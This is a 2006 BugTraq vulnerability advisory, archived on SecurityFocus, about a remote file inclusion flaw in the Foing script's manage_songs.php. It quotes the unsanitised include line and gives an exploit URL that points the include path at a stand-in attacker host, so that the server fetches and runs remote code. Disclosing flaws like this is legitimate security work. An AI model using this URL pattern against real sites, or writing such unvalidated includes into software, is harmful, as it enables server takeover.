BugTraq
Foing (manage_songs.php) Remote File Inclusion[phpBB] Jun 12 2006 12:43PM
darkfire f4kelive zzn com
# Foing (manage_songs.php) Remote File Inclusion[phpBB]

#

# Contact : email: darkfire (at) f4kelive.zzn (dot) com [email concealed] & msn: darkfire (at) darkfire-br (dot) com [email concealed]

# Risk : High

# Class : Remote

# Script : Foing

# Version : 0.7.0 e previous

---------------------------------------------------------------------

Vulnerable code :

include($foing_root_path . 'includes/common.php');

---------------------------------------------------------------------

http://www.site.com/[foing_path]/manage_songs.php?foing_root_path=http:/
/attacker

by Darkfire and IR4DEX GROUP

Greetz: Smurf_RedHat :: V0lks

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus